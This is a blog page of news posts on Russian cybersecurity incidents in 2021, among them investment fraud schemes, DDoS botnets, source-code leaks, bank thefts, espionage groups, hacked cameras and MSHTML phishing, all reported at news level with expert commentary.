Search This Blog

Showing posts with label Russian Cyber Security. Show all posts

Group-IB revealed 50 fraud schemes with fake investments

Analysts of Group-IB Company which specializes in cyber-security revealed more than 50 schemes of fake investment projects and more than 8 thousand domains connected with fraudulent infrastructure.

Fraudsters offer those who want to get rich quick to invest in cryptocurrencies, buying stocks of oil and gas companies, gold, pharmaceuticals, and other assets. Such schemes have been recorded by experts since at least 2016, but they became widespread in 2018-2020. Moreover, in the last nine months, there have been 163% more domains registered for fake investment projects than in all previous years.

CERT-GIB's 24/7 Cyber Incident Response Center has identified over 50 templates of landing pages with a variety of ready-made investment scenarios about how to invest money to "get rich quick without much effort."

Scammers illegally copied the style of popular news resources, such as Russia 24, RT, and RBC, to design their websites.

According to the Group-IB report, "as soon as a novice investor takes the "bait," he is directed to a survey site from a "well-known bank." As a rule, all of them are associated with trading in "crypto", fiat currencies, precious metals, minerals, natural resources, pharmaceuticals. Almost every project promises fantastic earnings - from 300 thousand to 10 million rubles per month".

Scammers ensure that the victim leaves his contact details. After that, a "personal consultant" calls the victim back, who offers to register in the system to make a profit. But for this victim needs to make a deposit of $250 or more.

Then the "investor" is shown his personal account in the system with the profit figures and trading results. However, these figures are "drawn", it is impossible to withdraw virtual money.

The "personal consultant" also asks the victim for bank card details and allegedly sends a request to the bank for approval of the deposit. In fact, the money is simply debited from the account.

In December, Group-IB experts estimated that monthly user losses from targeted fraud through surveys and sweepstakes worldwide amounted to $80 million.

Russians will face even more serious cyber threats in 2022

In particular, users should be wary of targeted ransomware attacks. Moreover, the damage will increase, not limited to the demand for ransom for encrypted data. Phishing and other types of attacks using social engineering will also remain popular with cybercriminals. In addition, attempts to hack smart devices are expected to rise.

Experts warned that business will become the most obvious target for attackers. The main blow will fall on supply chains, which are a weak link in protection due to the large number of participants in the process - contractors, contractors and business partners.

In December, it was reported that the barriers in Russian courtyards turned out to be a source of cyber threats. A vulnerability has been found in the device management system of the private company AM Video, which leads to the leakage of personal data. According to analysts, the discovered error allowed anyone to gain access to any of the company's facilities. To do this, it was necessary to log into a test account and select the identifier (ID) of cameras or barriers. The system provided access to all user data - names, addresses, phone numbers and car brands. Through the website, it was possible to block or open the entrance to the territory of the house, send notifications to residents on mobile phones and use their personal data.

Earlier it became known that 12 programs were found in the Google Play app store for Android devices that steal banking data from infected devices. Applications mimic document scanners and QR codes. After installing the application on the user's device, the program itself decides whether to download the virus to the phone. If the decision is positive, then the malicious code gets to the victim through a fake request to update the program.

Russian experts have discovered the largest botnet in the history of the Internet

Hackers have combined several botnets to carry out the most powerful DDoS attacks on the Network. Experts of the Russian company StormWall, a company specializing in protecting businesses from cyber threats, have recorded attacks with a capacity of more than 1 Tbit /s, lasting for several days. Most often, they affected companies in the entertainment sector, retail, publishing houses and the fintech sector.

StormWall reported that the attacks were carried out using a new botnet consisting of several tens of thousands of servers with different versions of operating systems, as well as webcams, routers, smart TVs.

Since the botnet includes different devices based on different operating systems, it can be concluded that they are infected in different ways. Each attack had approximately the same power, but at the same time different geographical distribution, which indicates that not one botnet was used, but several combined into a single control system.

According to experts, the botnet's resources were divided between several users who could launch DDoS attacks simultaneously. At the same time, to launch the attack, each attacker used not the entire botnet, but a part of it. But even a part allowed organizing an attack with a capacity of several hundred gigabits per second.

According to Artem Tereshchenko, Development Director of VAS Experts, today the Internet security resources are at a fairly high level, and in order to hack them, you need to generate as much traffic as possible.

Experts believe that the botnet poses risks for both technology companies that provide their services over the Internet and for their customers. The purpose of the botnet is not just to harm, but to seize the personal data of users and commercial data of the company itself.

According to StormWall experts, hackers are combining botnets in order to get the maximum attack power that can even penetrate DDoS protection. 

Software for hacking online cinemas is in open access

There was code repository published in Github for illegally downloading movies from Netflix, Amazon Video, Apple TV+, and other popular platforms. The published scripts allow you to bypass the protection technology used by Russian online cinemas, among others and download video content.

The authors of the TorrentFreak portal reported that on December 28, the software appeared on the international developer platform GitHub for free downloading content from major video services such as Netflix, Apple TV+, Amazon Video, Disney+ others. So, a user named Widevinedump published a code to bypass Widevine's DRM protection technology and posted 12 scripts that allow you to download paid content in resolution up to 720p from popular video services.

According to Karen Ghazaryan, Director General of the Internet Research Institute, almost every Internet browser has support for solutions that prevent illegal copying of files: Microsoft PlayReady or Adobe DRM. The DRM bypass technology, according to the expert, can also be applied to Russian online cinemas.

 “It will not be widely used, the mechanism requires special competencies, but professional pirates may well. So the number of movies and TV series uploaded to torrents will increase, which is very useful before the holidays, ”Mr. Ghazaryan believes.

Sergey Nenakhov, head of the cybersecurity audit department at Infosecurity a Softline Company, explains that Russian online cinemas mainly use the same technologies — Widevine from Google and FairPlay from Apple, some additionally embed watermarks in the video to identify leaks.

"But pirates can also make changes to the video stream, adding their own noise and "spoiling" watermarks to confuse the tracks," he adds.

According to experts, given the current level of availability of pirated content in the Russian Federation, this is unlikely to significantly change the situation.

The source code of the Public Services Portal of the Russian Federation was made publicly available

On December 25, a publication appeared on the Cybersec hacker website, in which the author posted the source code of Public Services Portal in open access. According to him, the data was downloaded from resources from mos.ru subdomains.

The author of Cybersec discovered an open repository containing the source code of Public Services Portal in the format.git and unencrypted. In addition to the source code, the leak contains ESIA certificates that can be used to hack accounts.

After studying the code, it turned out that the Public Services Portal was created on the Bitrix engine, and the ESIA authorization system was based on OpenID. The author noted that his study will help to find other vulnerabilities of the system and close them or wrap them in his side and steal user data.

Also in the article, the author said that before publication he turned to the administration of Public Services Portal to tell about the data leak. However, they only asked him for a detailed description of the leak and its confirmation, and after that they stopped responding at all.

The head of the analytical center specializing in information security, Zecurion, Vladimir Ulyanov, said that most likely the fault is the usual human factor. In such cases, it is always either someone simply made a mistake due to lack of competence or carelessness and allowed the code to be disclosed, or it is a deliberate leak of information from those who have access to the source code.

Ashot Oganesyan, the founder of the DLBI data leak intelligence and monitoring service, said that user data did not get into the Network. However, it cannot be ruled out that the compromised code will allow attackers to gain access to them in the future.

 

Hacker group attacked a bank's correspondent account in the Central Bank of Russia

For the first time in three years, the company's cybersecurity specialists Group-IB have identified a successful attack on the interbank transfer system of the AWP KBR (automated workstation of a client of the Bank of Russia).

In February 2021, the attackers carried out a hacker attack against one of the banks and stole funds, gaining access to the interbank transfer system of the AWP KBR. Analysts of the cybersecurity company Group-IB associate the hacking with the activities of the MoneyTaker group involved in previous similar attacks.

According to the Group-IB report, the attack began in June 2020 "through the compromise of a company affiliated with the bank," after which the bank's internal network was investigated for six months. 

In 2021, the attackers registered fake domain names using the name of the bank and the zone .org and .com, not .ru. After that, the attackers "stole digital keys and later used them to sign payments passing through the transport gateway of the Bank of Russia."

Hackers were able to steal more than 500 million rubles ($6.7 million). 

The experts emphasized that in the future, an increase in the number of such crimes is expected. “Taking into account the fact that we are more and more involved in electronic payments, then there will be more and more attempts to violate the law in this area”, said Nikolay Kulbaka, Financial Analyst and Associate Professor of Economics at RANEPA.

It is interesting to note that the hacker group Moneymaker was able to steal money from a Russian bank from its account in the Central Bank for the first time since 2018. Then more than 58 million rubles ($781 thousand) were withdrawn from the account of PIR Bank to the Central Bank. In the same year, the Central Bank revoked the license from PIR Bank due to violations of anti-laundering legislation.

Theft of personal data of Russians will be taken under control

The Ministry of Finance of Russia will take control of the theft and leakage of the personal data of citizens. The agency has signed a contract with TC Integration, which will monitor the darknet, hacker forums, and Telegram channels.

The amount of the contract of the Ministry of Finance is 24.3 million rubles ($326,000). Monitoring of personal data leaks should start working already at the end of January 2022.

TS Integration will manually and automatically collect information about the appearance of personal data on the darknet, tracking "cybercriminal forums with both open and restricted access", Telegram channels and hacker resources, applications for data exchange between software developers. In addition, the contractor will monitor the media reporting data theft. At least 300 resources are subject to monitoring, including those located in the Tor network.

It is assumed that the company will send weekly reports to the Ministry of Finance on all leaks, and on critical ones - on a daily basis, as well as to conduct a statistical analysis of the darknet. The Ministry will be able to transfer information about the identified leaks to the authorities, telecom operators and state-owned companies, which may be a potential source of information about citizens.

Experts believe that the monitoring system will make it possible to timely find and stop at an early stage the leakage of personal data, their sale or posting in the public domain, as well as respond in a timely manner and initiate an investigation.

Earlier, the head of the State Duma Committee on Information Policy, Information Technologies and Communications, Alexander Khinshtein, said that virtual space is becoming more and more real, and problems arising in the digital environment can carry not imaginary, but tangible threats. He called personal data leaks one of the most pressing topics.

Footage from thousands of hacked CCTV cameras sold online in Russia

Thousands of private CCTV cameras have been hacked in Russia, said Igor Bederov, head of the Information and Analytical Research department at T.Hunter. According to him, many of these devices are located in hotels, massage rooms, salons where intimate haircuts and depilation are done.

This is evidenced by the fact that there are many Telegram channels, VK publics and forums on the Web, where they sell access to hacked cameras or videos from them.

One of these channels published an advertisement for the sale of access to video from more than 300 cameras from other people's bedrooms, washrooms, medical offices, salons, changing rooms. Price — 600 rubles ($8). Thousands of screenshots from such cameras have been published as advertisements on the channel: one shows a naked woman on a massage table, the other shows a man doing intimate depilation.

“Owners of hotels, beauty salons and other types of businesses put cameras in their premises for security purposes. Often such cameras are located directly in the rooms or offices where intimate services are carried out. At the same time, they are not always properly protected,” Igor Bederov explained the reason for such leaks.

According to open sources, vulnerable cameras are located all over the world. Accesses are often sold by subscription. But this is not the only way to monetize hacked devices. For example, recently the media wrote about the sale of an archive of video from surveillance cameras in Russian hotels and saunas for 15 TB.

Experts said that in some cases such frames are used to blackmail the heroes of the video or the owners of the cameras. Various services are often used to identify people from photos. If people are not identified, hackers can always find the organization where these cameras are installed by metadata.

Oleg Bakhtadze-Karnaukhov, an independent researcher on the darknet, claims that most often attackers hack cameras with network port 37777.

It is very easy to protect the device at the same time — just change the factory settings. However, according to expert, this basic rule is often ignored.


Platforms for hiring “white hackers” may be created in Russia

 The service should become an intermediary between companies that want to check their information systems for security, and hackers who will receive a reward for hacking them. So, Rostelecom and Positive Technologies became interested in similar vulnerability search projects. But experts doubt the success of the projects: Russian companies, unlike foreign ones, often do not have budgets for such services, and they often simply do not respond to reports of vulnerabilities.

A representative of Positive Technologies said that the company plans to launch a platform in Russia in May 2022 that will become an aggregator of programs for “ethical hackers” to search for vulnerabilities, so-called bug bounty. As part of such programs, hackers receive rewards from companies for vulnerabilities found in their IT networks, systems, and applications.

Now, “white hackers” in most cases are looking for tasks on the international HackerOne platform. The interviewed experts expressed doubts about the advisability of creating a similar Russian service. In particular, Mikhail Sergeev, a leading engineer at CorpSoft24, pointed out that Russian business does not have the necessary budgets, and often large companies that can afford such a service “do not respond to reports of bugs found.”

“Launching a bug bounty program requires additional financial costs and a certain level of maturity of information security processes, which reduces the list of potential customers of such a platform in Russia”, added Ilya Shalenkov, head of the KPMG cybersecurity services group. The demand for such a service by Russian developers implies that they accept the “right to make a mistake.”

In August, it was reported that the Poly Network cryptocurrency platform, which lost several hundred million dollars as a result of hacking, decided to reward the hacker. Poly Network thanked the hacker for hacking the system and stealing $610 million. She offered him a reward of 500 thousand dollars. The statement did not specify in what form the money would be paid. It was also not specified whether the hacker accepted the award.


Hacker group RedCurl attacked a large Russian online store

Commercial espionage remains a rare phenomenon, but the success of this group can set a new trend.

The cybersecurity company Group-IB has discovered traces of new attacks by RedCurl hackers engaged in commercial espionage and theft of corporate documentation from companies from various industries. This time, the victim of the group was a Russian retailer, one of the top 20 largest online stores in Russia.

The company notes that it discovered a new Russian-speaking group last year, in the period from 2018 to 2020, it carried out 26 attacks, 14 victim organizations from different countries were identified. Among the hackers' targets are construction, financial, consulting companies, retailers, banks and insurance, legal organizations located in Russia, Ukraine, the UK, Germany, Canada, and Norway. In 2021, the attacks resumed.

According to experts, commercial espionage remains a rare phenomenon, but the success of this group can set a new trend. The company's specialists noted that since the beginning of 2021, 4 attacks have been recorded.

A feature of the group is the sending of phishing emails to different departments of the organization on behalf of the HR team. After a computer is infected, information about the victim's infrastructure begins to be collected on the organization's network; criminals are interested in the version and name of the infected system, the list of network and logical drives, and the list of passwords.

Experts note that the actions and methods of RedCurl are unique for Russian-speaking hackers, for example, from the moment of infection to data theft, it takes from 2 to 6 months. The group does not use standard means of remote control of compromised devices. Infection, attachment to an infected device, promotion on the network, and theft of documents are carried using self-written and several public tools.

The group does not encrypt the infrastructure of the victim company, does not withdraw money from accounts, and does not demand a ransom for stolen data. This may indicate that hackers are rewarded from other sources, and their goal is to secretly extract valuable information. According to the company, RedCurl is interested in business correspondence, personal files of employees, documentation on various legal entities, and court cases.


"Ransomware" screen on trams and TV billboards in Russia turn out to be ad from cyber security firm

According to Positive Technologies, provocative street art first appeared, mimicking ransomware malware. So, fictional windows of the Windows interface were depicted on trams with the inscription “All passengers with sad faces. This tram has been hacked,” it was written on the walls “We will return the wall for 3 BTC (bitcoin),” and on the TV screens — “Right now we will steal Antey.”

A few days later, the images were replaced by others, which had the QR code of the Positive Technologies company's manifesto video about the need to pay attention to information protection.

According to Positive Technologies, with the help of an unusual campaign, the company tried to attract the attention of people and organizations to cybersecurity problems, which have become especially acute recently.

“In 2020, compared to 2019, the number of unique cyber incidents increased by 51%. Seven out of ten attacks were targeted. Most often, cybercriminals attacked government and medical institutions, as well as industrial enterprises,” Positive Technologies reports.

Information security experts note that the number of cyberattacks in the world has increased by 40% this year compared to the previous one. As for Russia, the number of cyberattacks has increased even more significantly — by 54%.

“The concept of art is that we visually convey the process of a hacker attack. The information environment already affects the real one. The main desire is to show through clear and simple images that everything can be hacked in the modern world. And do not underestimate such threats, because while you are reading this text, someone can hack you,” said one of the artists.

The number of DDoS attacks on Russian companies has increased 2.5 times since the beginning of the year

The press service of Rostelecom reported that the number of DDoS attacks on Russian companies in the three quarters of 2021 increased 2.5 times compared to the same period last year.

According to the report, “the main targets of the attackers were financial organizations, the public sector, as well as the sphere of online commerce. The number of DDoS attacks on data centers and gaming, which were the focus of hackers a year ago, has decreased”.

The largest number of attacks occurred in Moscow, their share was 60% of the total number of incidents, the shares of other regions did not exceed 7%.

The company added that the number of DDoS attacks on banks increased by 3.5 times, almost 90% of them occurred in September.

The number of DDoS attacks in the online trading segment increased by 20%. The number of DDoS attacks on the public sector also doubled in August and September compared to the same period in 2020.

“Every year, the power and complexity of DDoS attacks increases. This is due to the active use of larger-scale botnets by hackers. They consist of a variety of devices, and more and more vulnerabilities are used to hack them,” said Timur Ibragimov, head of the Anti-DDoS and WAF platform of Solar MSS cybersecurity services at Rostelecom-Solar.

According to him, in particular, in September, the attackers organized the largest DDoS attack using the Meris botnet, the estimated scale of which is 200 thousand devices. “Such attacks are already directed at well-protected organizations and companies whose resources can only be disabled by a very powerful DDoS. For example, it can be banks, large industrial or energy enterprises, etc.,” he added.

It is worth noting that, according to Atlas VPN, the number of DDoS attacks worldwide in the first half of the year increased by 11%, reaching 5.4 million. Thus, the number of attacks in the first half of the year turned out to be a record.

The Consulate General of the Russian Federation in Ukraine called the hacking of its accounts an information provocation

 The Consulate General of Russia in Kharkiv (Ukraine) considers the hacking of its pages on social networks as an information provocation. “The issue regarding this incident will be resolved between Ukraine and Russia at the diplomatic level,” Igor Demyanenko, the head of the Consulate General, said on Thursday.

“We took it as an informational provocation that does not show Ukraine's compliance with the Vienna Convention on Consular Relations,” he said, adding that “the issue will be resolved through diplomatic channels between the Russian Foreign Ministry and the Ukrainian Foreign Ministry.”

Mr. Demyanenko said that such a situation had developed for the first time, and confirmed that access to the accounts of the Consulate General in social networks had already been restored. And the official website of the diplomatic mission posted a message stating that the information previously published by the attackers on the pages of the Consulate General is invalid.

At the same time, he noted that after the incident, the number of subscribers on the pages of the Consulate General increased fivefold.

Earlier on Thursday, it became known about the hacking of the accounts of the Consulate General of the Russian Federation in Kharkov on social networks Instagram and Facebook: congratulations on the Day of Defenders of Ukraine (October 14) appeared on the consulate's page, the record also contained provocative statements addressed to the Russian leadership allegedly on behalf of the consulate staff. After the hacker attack, the Consulate General lost access to account management. The Embassy of the Russian Federation in Kiev sent a note verbale to the Ministry of Foreign Affairs of Ukraine with a request to launch an investigation by the Ukrainian competent authorities.

The US did not invite Russia and China to an online conference on combating cybercrime

The US National Security Council organized virtual meetings this week to discuss countering ransomware operators. In total, 30 countries were invited to the conference, including Ukraine, Mexico, Israel, Germany, and the UK, however, Russia and China were not invited to the discussion.

The cyber threat posed by ransomware is increasingly worrying people at the highest level. The ransoms have already reached over $400 million in 2020 and $81 million in the first quarter of 2021.

US President Joe Biden announced in early October that representatives from more than 30 countries will work together to fight back against cybercriminals distributing ransomware. This initiative was the result of very dangerous and large-scale attacks by ransomware operators that recently hit Colonial Pipeline and Kaseya.

It is interesting to note that recently Russian Deputy Foreign Minister Sergei Ryabkov made it clear that Moscow is interested in discussing the problem of ransomware viruses with Washington, but does not want contacts to be limited only to this topic. “American colleagues are still trying to focus all their work on what interests them,” he complained at the time.

Despite the previously announced cooperation in the field of cybersecurity between Moscow and Washington, no one expected Russian official representatives at the meetings. The organizers of the meetings did not invite China and Russia.

Perhaps the reason lies in a misunderstanding that arose at a certain stage. The United States has repeatedly asked Russia to take measures against ransomware operators located in the country. White House Press Secretary Jen Psaki even promised that Washington itself would deal with these cyber groups if the Kremlin could not.

Half of the Russian websites of small and medium-sized enterprises have vulnerabilities

According to Tinkoff, almost half (46%) of online resources for SMEs in Russia have cybersecurity issues.

The most critical of the most common errors is the weak protection of cloud storage, threatening data leakage (identified in more than a quarter of organizations).

These disappointing statistics are based on the analysis of more than 40 thousand sites and databases of small companies / individual entrepreneurs. The most vulnerable areas in terms of information security were areas such as consulting, retail, and IT (44% of the problems found).

Most often (in 33% of cases) SMEs make domain verification errors. Such mistakes provoke the capture of a resource through data substitution.

The second place in the rating is taken by the threat of confidential information leakage arising from open access to the database or from the use of a weak password (27%). The ability to obtain a key by a simple brute-force attack allows an attacker to obtain personal data of customers and company employees, trade secrets, source codes of programs, etc.

The third most frequent cybersecurity error, according to Tinkoff, is SSL Unknown subject (15%). Such a problem during SSL-certificate verification threatens with interception and disclosure of data (MITM attack).

The researchers also found that the resources of SMEs are poorly protected from attacks by cryptographers (9%).

The top five problems also included another common error — an expired SSL certificate (7%). When the browser shows that the certificate is invalid, the site may fall out of access; as a result, the company loses potential customers.

“Unfortunately, cybersecurity is poorly developed in Russia and business does not realize how important it is to protect data. Firstly, the services of good and competent specialists are very expensive; secondly, after the crisis, companies direct working capital primarily for the purchase of goods and current needs,” comments Pavel Segal, First Vice President of “OPORA Russia”.

Putin demanded to protect children from harmful information on the Internet

Russian President Vladimir Putin demanded to protect children from harmful information on the Internet. He believes that this is a very urgent problem that the whole world is solving now. According to the president, there are people who, for their own profit, drive minors to suicide.

“As for information resources, I believe that our schools should use state information resources. This does not mean at all that we should reduce the space of freedom to a minimum. Not at all,” the Russian leader clarified.

Putin reminded that personal data of users are collected by all information resources, “so we should take care to ensure the safety of children and citizens in the online space”.

“And here, of course, only the state can be asked for their rational use and for ensuring the safety of people. Therefore, information resources in schools should be state-owned,” the president explained.

“We know, unfortunately, that all sorts of shameless people who do not think about anything but profit use the Internet to make a profit to the maximum. And, sorry for the bad manners, they didn't care about the fate of people and children. Therefore, this is where children are driven to suicide, here is child pornography,” Putin explained.

He also positively assessed the initiative of domestic Internet companies to create their own public organization to ensure the information hygiene of minors. “We will continue to support and help this,” the president concluded.  

On September 1, Putin said that the state and society should join efforts to create a safe online space for children. He expressed hope that global digital platforms will be involved in ensuring the safety of children online.


Russia plans to launch a platform for white hat hackers

Igor Lyapunov, the vice-president of Rostelecom on information security, told that the platform will function similarly to the HackerOne resource. The company was one of the first to attract hackers to cooperate. Twitter, Slack, Adobe, Yahoo! and other major resources work with it. HackerOne pays specialists for the bugs found.  The project will be implemented on the basis of the National Cyber ​​Polygon created by Rostelecom.

“Participation in vulnerability search programs is a really correct and useful practice, which allows detecting weaknesses in protection in time,” Lyapunov stressed, adding that banks have to use HackerOne for the same purposes one way or another.

Experts believe that the Russian analog of the platform will increase the security of the Russian banking infrastructure. It will provide access to the expertise of white hat hackers for companies that have legal difficulties using a foreign platform.

Tinkoff bank already uses such a platform, and several more Russian banks are planning to use their services in the future.

Nevertheless, experts pointed to the weak control of methods and tools. According to them, the reward always remains only a formal reason for participating in the research, while the real cost of the vulnerabilities found can be significantly higher on the black market. So, hackers may subsequently resell tools for hacking infrastructure.

The expert of the Jet Infosystems company does not see any risks in the use of foreign platforms by Russian banks, because each of them has rules and companies set restrictions for researchers. According to him, if the platform for white hat hackers is launched on the basis of the Russian National Cyberpolygon, Russian banks will trust this platform more.


Russia will develop a new cyber security standard

Positive Technologies is developing a new concept of cyber security standard. The document should become an open knowledge base, which will be exchanged between specialists to improve their qualification.

Today, each company sets up its own information security parameters; when a single standard appears, organizations will be able to develop the most effective solutions together.

Experts noted that the document will also help solve the problem of personnel shortage in the IT industry: specialists from other fields interested in information security will be able to get additional skills in this database and retrain to work in this field.

Oleg Gubka, Development Director of the Avanpost company, agrees that the initiative is relevant, but, in his opinion, the standard will be effective if it is developed well.

He believes that it is necessary to create an expert council of representatives of companies who would carefully study all sections of the standard according to their successful projects.

"Information security standards have existed for a long time, why come up with another one is a big question," said Fyodor Dbar, commercial director of Security Codes. 

He believes that this will not help solve the problem of inefficient spending of budgets on information security products, since cybersecurity strongly depends on the development of the organization and the attention of its top officials to launching new processes. And the driver in the cyber security market is not standards, but events such as the mass transfer of employees from the office to remote work or the emergence of new regulatory requirements.

According to Alexander Konovalov, Technical Director of Varonis Systems in Russia, there are enough standards, methods, training systems and guidance documents in this industry. He emphasizes that the problem lies in the work overload of specialized employees who are busy with “routine” and cannot fully master the acquired hardware and software for data protection. Therefore, the solution could not be another standard, but the expansion of the staff of information security departments.

MSHTML Attack Targets Russian State Rocket Centre and Interior Ministry

 

An MSHTML vulnerability listed under CVE-2021-40444 is being used to target Russian entities, as per Malwarebytes. 

Malwarebytes Intelligence has detected email attachments directed especially against Russian enterprises. The first template they discovered is structured to resemble an internal communication within JSC GREC Makeyev. 

The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic asset of the country's defence and industrial complex for both the rocket and space industries. It is also the primary manufacturer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centres for developing rocket and space technology. 

The email purports to be from the organization's Human Resources (HR) department. It stated that HR is conducting a check of the personal information given by workers. Employees are asked to fill out a form and send it to HR, or to respond to the email. 

When the recipient wishes to fill out the form, they must allow editing. And that action is sufficient to activate the exploit. When the target opens a malicious Office document, MSHTML loads a specially designed ActiveX control. The loaded ActiveX control can then execute arbitrary code to attack the machine with further malware. 

The second file, Malwarebytes discovered appears to be from Moscow's Ministry of the Interior. The attachment may be used to aim at a variety of fascinating targets. The documents' title translates to "Notification of illegal activity." 

It requests that the recipient complete the form and submit it to the Ministry of Internal Affairs, or respond to the email. It also encourages the targeted victim to do so within seven days. 

Malwarebytes further stated, they seldom come across proof of cybercrime against Russian targets. Given the targets, particularly the first, they think a state-sponsored actor is behind these assaults, and are investigating the source of the strikes. 

Vulnerability Patch

The CVE-2021-40444 vulnerability is rather outdated in nature (it involves ActiveX) however, it was just recently discovered. It wasn't long before threat actors were posting proofs-of-concept, tutorials, and exploits on hacker forums, allowing anybody to conduct their own assaults by following step-by-step instructions.

Microsoft immediately issued mitigation instructions that blocked the installation of new ActiveX controls and managed to squeeze a fix into its most recent Patch Tuesday release, just a few weeks after the flaw was made public. 

The time it takes to build a patch, on the other hand, is frequently overshadowed by the time it takes users to apply it. Organizations, particularly large ones, are frequently discovered to be far behind in patching, thus the chances of more cyberattacks like these increase.

The August cyber attacks targeted a dozen Russian banks

Up to 15 Russian financial organizations were subjected to a large-scale cyberattack in August and September of this year.

The first deputy head of the Information Security Department of the Bank of Russia, Artem Sychev, said that 10-15 Russian financial organizations that serve e-commerce were subjected to cyber attacks in August and early September.

According to him, it was several DDoS attacks. “Most of these attacks were repelled in an automated mode by the means that financial organizations have,” Sychev noted.

Financial CERT (Financial Sector Computer Emergency Response Team, a special division of the Bank of Russia) also helped to cope with the attacks, which quickly notified banks about the attacks and connected telecom operators to solving problems. They helped to quickly redirect traffic and enable tools that filter malicious traffic.

According to Sychev, the attacks were serious, but the attackers failed to disrupt the performance of credit institutions.

“But, nevertheless, there is such a risk of dependence on monopoly service providers for financial organizations,” he added.

“The events that took place in Russia in August and early September and were associated with massive DDoS attacks clearly showed that it is not enough for us, as the financial industry, to exchange information with each other, we need to do this with telecom operators, as they are the basis for interaction between customers and financial organizations. How quickly we can interact between financial organizations and telecom operators largely depends on how quickly we can respond to the attacks that occur in the financial sector, and how quickly we can cope with these attacks,” Sychev added.

On September 2, Deputy Chairman of the Board of Sberbank Stanislav Kuznetsov said that the bank had successfully repelled the world's most powerful DDoS attack on the financial sector.